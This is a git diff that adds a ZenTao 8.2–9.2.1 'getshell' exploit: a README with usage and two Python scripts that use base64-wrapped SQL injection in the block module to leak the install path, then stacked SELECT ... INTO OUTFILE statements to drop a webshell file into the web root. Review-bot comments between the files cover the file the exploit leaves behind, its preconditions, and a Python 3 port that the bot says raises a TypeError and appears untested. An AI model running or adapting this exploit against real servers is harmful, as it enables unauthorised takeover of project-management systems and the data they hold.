diff --git a/zentao-getshell/README.md b/zentao-getshell/README.md
new file mode 100644
index 0000000..4aacbb3
--- /dev/null
+++ b/zentao-getshell/README.md
@@ -0,0 +1,14 @@
+# zentao-getshell 禅道8.2 - 9.2.1前台Getshell
+## Python Usage
+
+`python exp.py http://127.0.0.1:81/ jas502n.php`
+
+
+
+
+
+
+## 来源
+
+https://github.com/jas502n/zentao-getshell
+
diff --git a/zentao-getshell/exp.py b/zentao-getshell/exp.py
new file mode 100644
index 0000000..6f611dd
--- /dev/null
+++ b/zentao-getshell/exp.py
@@ -0,0 +1,94 @@
+#coding=utf-8
+import requests
+import base64
+import re
+import sys
+import os
+import json
+
+
+banner = '''
+ ________ _______ .__ __. .___________. ___ ______
+| / | ____|| \ | | | | / \ / __ \
+`---/ / | |__ | \| | `---| |----` / ^ \ | | | |
+ / / | __| | . ` | | | / /_\ \ | | | |
+ / /----.| |____ | |\ | | | / _____ \ | `--' |
+ /________||_______||__| \__| |__| /__/ \__\ \______/
+
+ v8.2 - 9.2.1 Getshell
+
+ python by jas502n
+
+ usage: python exp.py http://127.0.0.1:81/zentao webshell.php
+
+'''
+print banner
+
+def get_web_dir(url,filename):
+ if url[-1] == '/':
+ url = url[:-1]
+ else:
+ url = url
+
+ payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}'''
+ base64encode_str = base64.b64encode(payload)
+ web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64encode_str
+ version_url = url + "/zentao/index.php?mode=getconfig"
+ r0 = requests.get(url=version_url)
+ json_str = json.loads(r0.text)
+ print "Cuurent Version= " + json_str['version']
+ print '\n' + web_dir
+
+ headers = {
+ "Referer":"http://127.0.0.1:81/zentao",
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
+ }
+
+ r= requests.get(url=web_dir, headers=headers)
+ if r.status_code==200 and 'SELECT' in r.content:
+ print '\n'
+ print r.content
+ m = re.compile(r'.*in (.*) on')
+ print
+ www_dir = m.findall(r.content)[0]
+ www_root = www_dir.replace('\\', "//")
+ print www_root
+ m = re.compile(r'(.*)framework',re.DOTALL)
+
+ # print '>>>>WWWROOT INSTALL: ' +
+ get_shell = "select '' into outfile '%s'" % (m.findall(www_root)[0] + 'www//' + filename)
+ print '\n%s\n' % get_shell
+ hex_str = get_shell.encode('hex')
+ payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_str
+ getshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64.b64encode(payload1)
+ # print "GetShell_URL=\n\n%s" % getshell_url
+
+ headers = {
+ "Referer":"%s/zentao"%url,
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
+ }
+ r1 = requests.get(url=getshell_url,headers=headers)
+ if r1.status_code == 200 and 'ID' in r1.content:
+ print getshell_url
+
+ webshell = url + "/zentao/" + filename
+ r2 = requests.get(url=webshell)
+ if r2.status_code == 200:
+ print "\n\n>>>>Webshell: \n%s" % webshell
+ else:
+ print "No Webshell Exit!"
+ else:
+ print "No Send Success into file!"
+
+
+ else:
+ print "No Exit!"
+
+
+
+
+if __name__ == "__main__":
+ # url = "http://127.0.0.1:81/"
+ url = sys.argv[1]
+ filename = sys.argv[2]
+ get_web_dir(url,filename)
\ No newline at end of file
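Review bot: get_web_dir has no docstring, and nothing in the file states what it leaves behind on the instance it is run against: the second request writes a file named `filename` into the install's `www/` directory through `SELECT ... INTO OUTFILE`, and the script then only checks that the file is reachable, never removing it. I would add a comment above the function, `# Side effect: creates <filename> under the instance's www/ directory and does not delete it; remove it after the test.`, so a tester knows there is an artifact to clean up. The comment could also record what the code visibly depends on: SQL error text in the first response that discloses the install path, stacked statements being accepted (`SET ...;PREPARE ...;EXECUTE ...`), and, presumably, a database account allowed to write files. Those are the settings a defender would tighten, and the page names 8.2 - 9.2.1 as affected but no fixed release. The same documentation gap applies to exp_py3.py.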
diff --git a/zentao-getshell/exp_py3.py b/zentao-getshell/exp_py3.py
new file mode 100644
index 0000000..e4ff0c4
--- /dev/null
+++ b/zentao-getshell/exp_py3.py
@@ -0,0 +1,97 @@
+# coding=utf-8
+import requests
+import base64
+import re
+import sys
+import os
+import json
+
+banner = '''
+ ________ _______ .__ __. .___________. ___ ______
+| / | ____|| \ | | | | / \ / __ \
+`---/ / | |__ | \| | `---| |----` / ^ \ | | | |
+ / / | __| | . ` | | | / /_\ \ | | | |
+ / /----.| |____ | |\ | | | / _____ \ | `--' |
+ /________||_______||__| \__| |__| /__/ \__\ \______/
+
+ v8.2 - 9.2.1 Getshell
+
+ python by jas502n
+
+ usage: python exp.py http://127.0.0.1:81/zentao webshell.php
+
+'''
+print(banner)
+
+
+def get_web_dir(url, filename):
+ if url[-1] == '/':
+ url = url[:-1]
+ else:
+ url = url
+
+ payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}'''
+ base64encode_str = base64.b64encode(payload)
+ web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64encode_str
+ version_url = url + "/zentao/index.php?mode=getconfig"
+ r0 = requests.get(url=version_url)
+ json_str = json.loads(r0.text)
+ print("Cuurent Version= " + json_str['version'])
+ print('\n' + web_dir)
+
+ headers = {
+ "Referer":
+ "http://127.0.0.1:81/zentao",
+ "User-Agent":
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
+ }
+
+ r = requests.get(url=web_dir, headers=headers)
+ if r.status_code == 200 and 'SELECT' in r.content:
+ print('\n')
+ print(r.content)
+ m = re.compile(r'.*in (.*) on')
+ print()
+ www_dir = m.findall(r.content)[0]
+ www_root = www_dir.replace('\\', "//")
+ print(www_root)
+ m = re.compile(r'(.*)framework', re.DOTALL)
+
+ # print '>>>>WWWROOT INSTALL: ' +
+ get_shell = "select '' into outfile '%s'" % (
+ m.findall(www_root)[0] + 'www//' + filename)
+ print('\n%s\n' % get_shell)
+ hex_str = get_shell.encode('hex')
+ payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_str
+ getshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64.b64encode(
+ payload1)
+ # print "GetShell_URL=\n\n%s" % getshell_url
+
+ headers = {
+ "Referer":
+ "%s/zentao" % url,
+ "User-Agent":
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
+ }
+ r1 = requests.get(url=getshell_url, headers=headers)
+ if r1.status_code == 200 and 'ID' in r1.content:
+ print(getshell_url)
+
+ webshell = url + "/zentao/" + filename
+ r2 = requests.get(url=webshell)
+ if r2.status_code == 200:
+ print("\n\n>>>>Webshell: \n%s" % webshell)
+ else:
+ print("No Webshell Exit!")
+ else:
+ print("No Send Success into file!")
+
+ else:
+ print("No Exit!")
+
+
+if __name__ == "__main__":
+ # url = "http://127.0.0.1:81/"
+ url = sys.argv[1]
+ filename = sys.argv[2]
+ get_web_dir(url, filename)
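Review bot: exp_py3.py cannot run under Python 3 as committed: `base64.b64encode(payload)` near the top of get_web_dir is handed a `str`, which raises `TypeError` before any request is made. Apart from the converted `print(...)` calls and line wrapping, the body matches exp.py, which suggests the port was produced mechanically and never exercised. I would either drop this file from the commit or mark it in the README, e.g. `exp_py3.py: unverified port, not tested`, so the README does not advertise a variant nobody ran.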
diff --git a/zentao-getshell/zentao.gif b/zentao-getshell/zentao.gif
new file mode 100644
index 0000000..a89908c
Binary files /dev/null and b/zentao-getshell/zentao.gif differ
diff --git a/zentao-getshell/zentao.jpg b/zentao-getshell/zentao.jpg
new file mode 100644
index 0000000..af0fdc4
Binary files /dev/null and b/zentao-getshell/zentao.jpg differ